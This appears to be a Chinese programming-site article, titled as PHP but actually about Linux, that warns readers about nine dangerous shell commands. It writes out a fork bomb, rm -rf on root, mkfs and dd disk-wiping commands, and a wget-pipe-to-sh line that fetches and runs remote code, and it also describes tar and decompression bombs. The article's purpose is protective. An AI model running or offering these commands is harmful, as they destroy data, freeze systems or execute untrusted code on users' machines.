程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> 9個必須時刻警惕的PHP命令&代碼

9個必須時刻警惕的PHP命令&代碼

編輯:關於PHP編程

9個必須時刻警惕的PHP命令&代碼


Linux shell/terminal命令非常強大,即使一個簡單的命令就可能導致文件夾、文件或者路徑文件夾等被刪除。

在一些情況下,Linux甚至不會詢問你而直接執行命令,導致你丟失各種數據信息。

一般來說在Web上推薦新的Linux用戶執行這些命令,當然,也有人哪些寫過這代碼的人不這麼想,因為這玩意你一寫下去就不是玩笑了。

這裡我收集了一些對系統有危害的Linux代碼,幫助你避免他們。請記住:這些代碼非常危險,甚至可以經過修改,變得更加有危害性。

還有一些事情需要注意:一些命令只在Ubuntu中有sudo前綴時是有危害的。其他發行版本的Linux,則是在作為根目錄命令時會有危害。

1. Linux Fork Bomb Command

:(){ :|: & };: 以Fork Bomb聞名,是一個拒絕服務攻擊 的Linux 系統。:(){ :|: & };: 是一個bash函數。只要被執行,他會不斷重復,直到系統被凍結。

你只能重啟系統解決這個問題。所以當你在Linux界面執行這個命令時一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null 也是一個危險的命令。Dev/null 或者 null device 是一個刪除所有寫在這個設備文件上數據的設備文件,但是,該操作提示卻是寫入操作執行成功。這就是我們常說的bit bucked 或者 black hole。

3. Rm -Rf Command

rm -rf命令在Linux系統中可以快速刪除文件夾及其內容。如果,你不知道如何正確使用它,你就只有哭了。

列下m-rf 命令最常見的組合和選擇:

  • rm command :刪除Linux系統的文件
  • rm -f command:不需提示,刪除文件中的只讀文件
  • rm -r command 循環刪除文件夾的內容
  • rm -d command :刪除空目錄,如果非空目錄則不會執行該操作
  • rm -rf/ command:強制刪除根目錄中的所有內容和子文件夾包括寫保護文件)命令。
  • rm -rf* command :強制刪除當前目錄中的所有內容當前工作目錄)和字文件夾
  • rm -rf. command:強制刪除當前文件夾目錄/子目錄中的所有內容 。同rm -r.[^.]*

The rm -r.[^.]* command :刪除文件及文件夾,帶有刪除提示

4. Mkfs Command

如果你不知mkfs的作用,那麼它也是一個危險的命令,mkfs之後寫的任何命令都將會被一個空白的linux文件系統格式化、替代。

下面列舉出需要管理員權限,格式化硬盤的命令:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos mkfs.reiserfs
  • mkfs.vfat

mkfs.cramfs也可以和上面的代碼做同樣的事情,不過不需要管理源權限。

5. Tar Bomb

tar命令用於將多個文件以.tar格式放入一個文件中存檔文件)。Tape Archive (Tar) bomb可以由他創建。

當為壓縮時,就是這個存檔文件生成數以萬計的相似名稱文件出現在當前目錄中而不是新目錄。

當收到tar文件,定期創建一個新的保護目錄,然後在解壓前將接受的tar文件放到這個目錄中,你可以避免成為tar bomb的受害者。

6. Dd Command

Dd命令用於復制&改變硬盤分區。如果,你用錯地方了,那麼也很危險。

下面列舉dd命令:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

下面這個命令會將整個主硬盤清零:dd if=/dev/zero of=/dev/had

7. Shell Script Code

有時候,你可能會被人坑,給你一個shell腳本文件,讓你去下載並執行它。該腳本可能會包含一些惡意的或危險的代碼。命令形式可能會是這樣:wget http://some_malicious_source -O- | sh。 wget將會在sh狹隘腳本時下載腳本。

8. Malicious Source Code

也許有人會給你源代碼讓你編譯他。代碼可能是正常代碼,不過,有一些惡意代碼偽裝在大型源代碼中,如果是這樣,你的系統就中槍了。如何避免?僅接受並編譯可信賴來源的源代碼。

9. Decompression Bomb

你已經收到一個壓縮文件,你被要求提取這個看起來很小的文件,可能小到KB。事實上,該小尺寸的壓縮文件包含高度壓縮數據。

只要文件解壓,上百GB數據會被提取,這時候,過大的數據填滿硬盤導致宕機,幾率就很大了。如何避免?還是那句老話,別手賤,什麼文件都去接收,請接收可信任來源文件。

 

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved